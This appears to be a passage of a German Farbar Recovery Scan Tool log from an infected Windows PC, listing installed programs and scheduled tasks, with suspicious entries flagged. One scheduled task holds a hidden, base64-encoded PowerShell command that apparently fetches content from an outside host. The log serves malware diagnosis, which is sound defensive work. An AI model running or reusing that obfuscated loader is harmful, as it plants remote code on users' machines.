Microsoft SQL Server Compact 3.5 SP2 DEU (HKLM-x32\...\{0125D081-30D0-4A97-82A8-C28D444B6256}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 DEU (HKLM\...\{C3EAE456-7E7A-451F-80EF-F34C7A13C558}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{5A08C9D1-37AD-4A8D-90D3-33F92C578AA5}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft Visual Basic 2008 Express Edition - DEU (HKLM-x32\...\Microsoft Visual Basic 2008 Express Edition - DEU) (Version:  - Microsoft Corporation)
Microsoft Visual Basic 2010 Express - DEU (HKLM-x32\...\Microsoft Visual Basic 2010 Express - DEU) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.30319 (HKLM\...\{94D70749-4281-39AC-AD90-B56A0E0A402E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2008 Remote Debugger Light (x64) - DEU (HKLM\...\Microsoft Visual Studio 2008 Remote Debugger Light (x64) - DEU) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{616C6F39-4CE1-3434-A665-2F6A04C09A7F}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Express Prerequisites x64 - DEU (HKLM\...\{3C983A67-DFB2-3D3D-AD9E-CA1A5A09FD18}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Service Pack 1 (HKLM-x32\...\Microsoft Visual Studio 2010 Service Pack 1) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Windows SDK for Visual Studio 2008 Express Tools for .NET Framework (HKLM\...\{53C900F7-0CB1-3EDE-B9F3-76EDE6F0C253}) (Version: 3.5.21022 - Microsoft)
Microsoft Windows SDK for Visual Studio 2008 Express Tools for Win32 (HKLM\...\{11EB1163-5761-4BC6-8F48-98DCF6A46BBF}) (Version: 6.1.5288.17011 - Microsoft Corporation)
Microsoft Word 2002 (HKLM-x32\...\{911B0407-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{5B680750-760B-49E4-81E7-21B2B337F9F7}) (Version: 07.03.0512 - Microsoft Corporation)
Microsoft Works Suite-Add-Ins für Microsoft Word (HKLM-x32\...\{4EAD2E21-1D4A-4E2B-A082-8D08961539C9}) (Version: 7.0.0.0000 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.0 (HKLM-x32\...\{3898934B-05AE-41CD-96BE-70DA9BFBCE1F}) (Version: 3.0.11010.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minecraft Note Block Studio version 3.2.1 (HKLM-x32\...\{84077DA9-3075-4AE5-BC82-345202B8CD4F}_is1) (Version: 3.2.1 - David Norgren)
Mozilla Firefox 38.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 38.0.5 (x86 en-US)) (Version: 38.0.5 - Mozilla)
MpcStar 5.3 (HKLM-x32\...\MpcStar) (Version: 5.3 - www.mpcstar.com)
MSDN Library for Microsoft Visual Studio 2008 Express Editions (x32 Version: 9.0.21022 - Microsoft Corporation) Hidden
MSDN Library für Microsoft Visual Studio 2008 Express Editions (HKLM-x32\...\MSDN Library for Microsoft Visual Studio 2008 Express Editions) (Version:  - Microsoft Corporation)
MSI Afterburner 3.0.1 (HKLM-x32\...\Afterburner) (Version: 3.0.1 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.3.2 - Notepad++ Team)
NVIDIA 3D Vision Controller-Treiber 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 355.60 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 355.60 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.12.11 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.12.11 - NVIDIA Corporation)
NVIDIA Grafiktreiber 355.60 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 355.60 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
OBS Multiplatform (HKLM-x32\...\OBS Multiplatform) (Version: 0.12.0 - OBS Project)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Orcs Must Die! 2 (HKLM-x32\...\Steam App 201790) (Version:  - Robot Entertainment)
Origin (HKLM-x32\...\Origin) (Version: 9.3.1.4482 - Electronic Arts, Inc.)
PacSteamT (HKLM-x32\...\PacSteamT) (Version: 1.1.6.7 - PaCmAn_Packs)
Painkiller: Black Edition (HKLM-x32\...\Steam App 39530) (Version:  - People Can Fly)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Phase 5 HTML-Editor (HKLM-x32\...\{20B1B020-DEAE-48D1-9960-D4C3185D758B}) (Version: 5.6.2.3 - Systemberatung Schommer)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
POSTAL 2 Complete (HKLM-x32\...\Steam App 223470) (Version:  - Running With Scissors)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
puush (HKLM-x32\...\{C3592426-531E-4110-911D-BFECE2CE284B}) (Version: 1.0.0.0 - Dean Herbert)
QuickTime (HKLM-x32\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6378 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.4320 - CyberLink Corp.) Hidden
Reflector (HKLM\...\{355C1E06-D3C3-480C-B1FB-93F49E4F29D2}) (Version: 1.5.0.0 - Squirrels)
Remote Graphics Receiver (HKLM-x32\...\{16FC3056-90C0-4757-8A68-64D8DA846ADA}) (Version: 5.4.5 - Hewlett-Packard)
Samson Sound Deck (HKLM-x32\...\{ABEAC23D-3C40-4D5D-8018-82C255B941F0}) (Version:  - Samson)
Samson USB Audio Basic (HKLM-x32\...\{74E1767C-6DA4-448C-ABE9-FA8D2A740048}) (Version:  - Samson)
Setup-Start von Microsoft Works 2004 (HKLM-x32\...\Works2004Setup) (Version:  - )
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.12.11 - NVIDIA Corporation) Hidden
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
SkypEmoticons (HKLM-x32\...\SkypEmoticons_is1) (Version:  - ) <==== ACHTUNG
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Slender: The Arrival (HKLM-x32\...\Steam App 252330) (Version:  - Blue Isle Studios)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Spotify (HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Spotify) (Version: 1.0.20.94.g8f8543b3 - Spotify AB)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Streamtip Alerter (HKLM-x32\...\{946E75BA-B3DA-470C-80EC-66AE17107334}_is1) (Version: 0.1.6 - NightDev, LLC)
Surgeon Simulator 2013 (HKLM-x32\...\Steam App 233720) (Version:  - Bossa Studios)
Takedown: Red Sabre (HKLM-x32\...\Steam App 236510) (Version:  - Serellan LLC)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.45862 - TeamViewer)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Binding of Isaac (HKLM-x32\...\Steam App 113200) (Version:  - Edmund McMillen and Florian Himsl)
Theme Resource Changer X64 v1.0 (HKLM\...\Theme Resource Changer X64 v1.0) (Version:  - Bad Ass Apps)
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version: 7.56a - Ghisler Software GmbH)
TP-LINK TL-WN781ND Driver (HKLM-x32\...\{87C7B472-9BC2-43C8-9F03-86D2908E1A51}) (Version: 1.2.1 - TP-LINK)
TP-LINK Wireless Configuration Utility (HKLM-x32\...\{319D91C6-3D44-436C-9F79-36C0D22372DC}) (Version: 1.2.1 - TP-LINK)
Trials Evolution Gold Edition (HKLM-x32\...\Steam App 220160) (Version:  - RedLynx and Ubisoft Shanghai)
Tt eSPORTS BLACK (HKLM-x32\...\{17885341-8A1D-4C6E-8F90-366B227D30C8}) (Version: 0.0.1 - Tt eSPORTS)
Tt eSPORTS Challenger Ultimate (HKLM-x32\...\{D65D9706-6D6D-42E8-A11A-63E3AFECBBC1}) (Version: 2.0.2.0 - Tt eSPORTS)
Unity Web Player (HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\UnityWebPlayer) (Version: 4.5.5f1 - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)
Urban Trial Freestyle (HKLM-x32\...\Steam App 243450) (Version:  - Tate Multimedia)
USB Vibration Gamepad (HKLM-x32\...\{CC27E302-DB87-4314-883D-090C3BA74379}) (Version: 2005.10.27 - )
UxStyle Core Beta (HKLM\...\{8E363055-15E5-4D8A-9C69-A0A9DE9A3337}) (Version: 0.2.1.1 - The Within Network, LLC)
VC Runtimes MSI (x32 Version: 9.0.21022 - Microsoft) Hidden
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (x32 Version: 1.0.0 - Nero AG) Hidden
Vegas Pro 12.0 (64-bit) (HKLM\...\{A7C8BBDE-FE98-11E1-87C9-F04DA23A5C58}) (Version: 12.0.367 - Sony)
VIP Access SDK (1.0.1.4)  (HKLM-x32\...\VIP Access SDK) (Version: 1.0.1.4 - Symantec Inc.)
Virtual Audio Cable 4.10 (HKLM\...\Virtual Audio Cable 4.10) (Version:  - )
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 DEU (HKLM-x32\...\{CFCB8616-A5D1-4281-80E8-389F685BFAE2}) (Version: 4.0.8080.0 - Microsoft Corporation)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Waveform (HKLM-x32\...\Steam App 204180) (Version:  - Eden Industries)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
WinRAR 4.11 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 4.11.0 - win.rar GmbH)
Worms Armageddon (HKLM-x32\...\Steam App 217200) (Version:  - Team17 Digital Ltd.)
Worms Ultimate Mayhem (HKLM-x32\...\Steam App 70600) (Version:  - Team17 Software Ltd.)
Xfire (remove only) (HKLM-x32\...\Xfire) (Version:  - )
XSplit (HKLM-x32\...\{24570B2F-3937-47F0-A16A-E82B480A7699}) (Version: 1.1.1210.3101 - SplitMediaLabs)
Zeno Clash 2 (HKLM-x32\...\Steam App 215690) (Version:  - ACE Team)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {062C2762-9E7E-4250-B358-94151F785948} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2011-06-15] ()
Task: {0895D73B-76BB-4427-B9C1-946B5B436E45} - System32\Tasks\RunAsStdUser Task => C:\Users\VadimSch\AppData\Local\RavenBleuSA\bin\1.0.13.0\RavenBleuSA.exe
Task: {0CC6F14B-A749-49CE-AA57-883E4E51A9F1} - System32\Tasks\{1F189BF6-96F5-46B7-94FA-FCE2A999B3A0} => pcalua.exe -a C:\PROGRA~2\Team17\WORMSA~1\UNWISE.EXE -c C:\PROGRA~2\Team17\WORMSA~1\INSTALL.LOG
Task: {1287874F-3C08-4CCF-B340-2353EDD0E038} - System32\Tasks\{4396CE57-97D0-4C72-AA73-7F34792E80C4} => Chrome.exe hxxp://ui.skype.com/ui/0/6.3.0.107/de/go/help.faq.installer?LastError=1638
Task: {186B9D38-1E06-4E09-AE5D-0761F7917BD0} - System32\Tasks\AdobeAAMUpdater-1.0-TRuNixX-VadimSch => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2014-10-14] (Adobe Systems Incorporated)
Task: {1B201100-63BE-4564-88D7-0C8F853F31B4} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {249106D1-BBA8-4A6C-8DEB-F6A9CE022A7D} - System32\Tasks\SomotoUpdateCheckerAutoStart => C:\Users\VadimSch\AppData\Local\FilesFrog Update Checker\update_checker.exe <==== ACHTUNG
Task: {2583A03E-E188-40C3-BEE4-116C7B187F6B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {2D32AB13-E47F-41E8-A3C6-CECA93CF314A} - System32\Tasks\{76D3C411-4756-A571-5526-2C017D45B9F9} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG0AbwBvAG4AYQBzAC4AaQBuAGYAbwAvAHUALwA/AHEAPQBNADQAUQB3AEYAUQBQAEMAYQBTAGMAeABfAHcAZQB5AFUAdgByADgATwBRADYASwA5AEEAWQBEAFAAeQA1ADAAOQBqAC0AWQBtAHkAWQBJAHYAaABEAGsAawBKAFcAcQBjAFkANwA1AC0AWABoAGIANgBNAHcAYgB1AEkARABHAG8AZQB1AEEAdgBHAHIAMQBtAFQATwB1AFAARQB3AEYANgBLAG4AeQBSAHIAQQBBAEoAWAB0ADAAZAA2AEkAUABTAE0AbgA5AEoATwBVAEYATgBKAFAASQBoAGgAagBHAHkATABMAHEAbgBBAHYAYwB3AFkASgBTADcAOQBoAGIAQwBkAC0AMgB0ADYAZQBEAEgAMwA5AHcAbgBxADgAVQBSAE4AQQBkAFUAYwBoADkAdwBJADgAUAB4AEwAcgBZAG0AWgBOAEsAUwB2ADMAOQBmAFgASgByADMAQwBrAEgASQBzAFUAagA2AFAAUQBQAC0AZgBvAF8AcABpAGwASgBHADgAegB2AGwAYgBfAEEAZwBjAG8AcAA1AHEAZABWADUAdgBGAHcAcgBaADYALQBvAGgASQBoAGkAawA1ADAAZAA5ADgAZAAzAE0AaAAyAGUAaABwAHQAZwB3ADkATQBUADIAUwBXAEgASQBhAEYATgB6AHoAMQBZAC0AcABVAEMAdwBQAGcARQA5AEQAeQAtAHIAZgBWADQAZgBvAEgAUABvAEIAawBvAHIARgBhADQAVAAyAEYAdwBDAFIAbQAzAFIARgBnAEQAWQBPAGYAcQA2AC0AVwBKAFkAcABnAHEASgA0ADYASgBXAGcAbQBPAGYAWQBhAHoAdAB3AEEAeQB4ADYAWgBDAHEAdgBOAGwAeAB5ADYAbQB6AHAAaQAzAFcANABiAHQAUQBfAFcALQBIAHQAcAAxAHUAYwBVAEMAWABzADcAOAAxAHAARQBmAGMAegBpAG8AWgBhAEgAcgBqAEgAdQBUAHoAcQBKAHEANwBiADkANABmAF8AcwBXAHYAOQBsAEEAUQB1AGwAUwBfAG0AVQBuAGMAMgBrADUARwB0AEUAWQBTAEwAbQBJADIAagByADcAUQBYAEQAbQBxAGcAQgBNAFkASwBzAFYASABxAHUAQQBJAGQAbABBAEgAdAA2ADQAOQBKAEwAdQBxAFYASwBJAEsAaABTAEcAawBTAFAAcQBDAGcAbgA2ADcANwBrAE4AawB6AHMAJgBjAD0AQQBlAEMANgBhAFUARABEADgATwBjAHUAdgBjAFcAOQBBAGIAZAAwAEIAcABNAG0AYgBCAFQAVABDAHAAVwBxAEEAXwAzAGkAaAAzAFEAdwBaAFUANABhAE0AZABuAFYAMgBmADYARQAtAGQAUgBtAEoAQwBOADkANQBwAFgAbQAtAGQAYgBJAGIAVwBaAE8ASwBVAGsASgBRAFIAVgBPAE0AUABmAEMAdABkAHgAYgAwAEwASgBlAGMARABKAGMAQgBUAFUASgBTAFQAUgB3AFkAVwAwAGQAUQBuAFIAUQBEAG8ANQBuAGMANAAzAEIAeABtAE8AQQByAGsAUgB2AHIAVABFAGsAMQBiAHIARwBJAFUAcABIAGQAZAA3ADMAaQBLAG8AZABqAFIANABCAFUARgBOAHcAcgBfAGMAZwBDADAASQAxAEUAUwBWAHAAZAB2AE0AdABTADgAQQBXAHQAUgBkAHcAVgBTAF8AMgBQAGgAdAA3AHYARABmAE4AegBIAHkATAA0AHoAMQBiAHgAcQBuAEwAZwBQADIAawAxAEQATABUAEcAUgBqAEcASQBGAE0AQgBVAEIAaQBnAFIAdgAzADkAZQB1AFYAawBRAEsAVgB5ADUAcgBaAEkAMwBJAGIAYgBOAE0ASABlAEMAdQBnADUANwB0AE8AbABRADEAeAB3AFQAYQBUAGMAMgBQAHQAaABpAGoAWQAtAHkASwB0AHIAMgBFAC0ARQBNADMASQBFAGgAZAB3AGwAYQAxAFkAbgA1AEcATABwAGgAZwBsAHYAUwBZAGoASQBMAGIAMABwAE8AZABLAGQAOQBnAFkAaABwADkAZwBXADIANABMADgARgBKAHkASQBBAHAAVQBaAFkAcABCAHAASwBzAG4AVABHADYAdAA3ADIAcAB6AC0ARgBVAG4ASQBCAEgAWABUAHIAMABjAEcAUwBjAEQAcwBqAGoAdgBqAFkAWQBuAGUAdQBYAGUASABjAFoAaABRAEcAbQBlAFIATwBQAG0AQgBxAEMARABZAGcAWABiADEAVgBlAEkAQwBEAEMAdQBEAEMAMQBQADUAaAByAHcAMwA3AHYAZgAxAEEANQAzAFMAOQBpAG4AYQBwAG8AbQBFAG0AeQB1AHIAbgBvAFkAQgBwAC0AZAAwAE8AcgB4AGwAVQBuAHkAbQBwAHIAUAB4AF8AdQBtAHIARgBsAGwARwBNAHAASQBQAEgAWQBVAGMATwBpAHQATAA3AHYAUQBBAG8AYwBSAHcATQBOAFQASgBZADMAdgA2AG0AVABjAF8AcgBmAEkANABLADYANgBLAEoAVQBMAEQAdgBoAHEATwBkAHEARwBrAEUAeQB4AGkAbwA3ADUAWgBsAFYAQQAzAFoAbgB6AHYAMABVAGIAbgBtADYATgBFAEYANQByADYASwBUAFUASABlAE4AYQBwADcAbgBPAEgAdgBtAHMARQA4AHUAcAB2AEIARABCAFcAaQBrAFIAQwBfAFkARwBuADAAdgAtAFIAeABxAHYASQBhAGYAMwA2AEoANwA3AE8AWgByADIAOQBxAEcALQBwAHAAMABpAGgAdABHAGoAbgA2AG4ASQBrAGsAcABSAHkAbABqADUAMgBvAHMATwBLAEMAcQBnAGgANQBUADgARQBtAFUAQgBLAEEAXwBXAG0AZwBkAEYAVABJAHgAWQBwAGMAZgAzAGsAbABTAC0ANABzAEMARABNAHIASgBZADIAXwBsAE8AYgAtAEMAWABJAEUAbAAwAHQANgAzAFUAJgByAD0AOAAxADYANQA5ADQANwA4ADkAMgAyADYAMAAxADgAMgA0ADQAMwAiADsAJABzAHQAcwBrAD0AIgB7ADcANgBEADMAQwA0ADEAMQAtADQANwA1ADYALQBBADUANwAxAC0ANQA1ADIANgAtADIAQwAwADEANwBEADQANQBCADkARgA5AH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8